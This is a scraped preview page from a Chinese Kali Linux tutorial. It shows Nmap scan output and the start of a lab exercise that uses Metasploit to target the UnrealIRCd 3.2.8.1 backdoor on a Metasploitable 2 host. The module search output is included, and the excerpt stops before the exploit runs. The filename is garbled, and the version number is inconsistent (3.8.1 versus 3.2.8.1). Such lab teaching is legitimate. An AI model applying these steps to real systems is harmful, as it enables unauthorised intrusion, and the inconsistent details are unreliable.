Kail Linux汆芵聆彸妗捄忒聊菴侐梒.pdf

Nmap done 1 ip address 1 host up scanned in 2558

Info icon This preview shows pages 8–10. Sign up to view the full content.

Nmap done: 1 IP address (1 host up) scanned in 25.58 seconds 从输出的信息中,可以看到目标主机上所启动的服务及服务软件版本。例如 Unreal Internet Relay Chat IRC )服务,它的版本是 3.8.1 。用户可以通过获取到服务的版本,进行 攻击主机。下面将会以例子的形式介绍通过服务版本,攻击主机的方法。 【实例 4-3 】在 MSF 终端实现渗透攻击 Unreal IRC 服务。本例中选择使用 Metasploit 2 系统作为攻击目标,其地址为 192.168.6.105 。具体操作步骤如下所示: 1 )启动 MSF 终端。执行命令如下所示: [email protected]:~# msfconsole msf> 执行以上命令后,看到 msf> 提示符表示已成功登录 MSF 终端。 2 )查询 Unreal 3.2.8.1 可利用的模块。执行命令如下所示: msf > search Unreal 3.2.8.1 Matching Modules ================ Name Disclosure Date Rank Description ---- --------------- --------------- --------------------------- exploit/linux/games/ut2004_secure 2004-06-18 good Unreal Tournament 2004 "secure" Overflow (Linux) exploit/unix/irc/unreal_ircd_3281_backdoor 2010-06-12 excellent UnrealIRCD 3.2.8.1 Backdoor Command Execution exploit/windows/games/ut2004_secure 2004-06-18 good Unreal Tournament 2004 "secure" Overflow (Win32)
Image of page 8

Info icon This preview has intentionally blurred sections. Sign up to view the full version.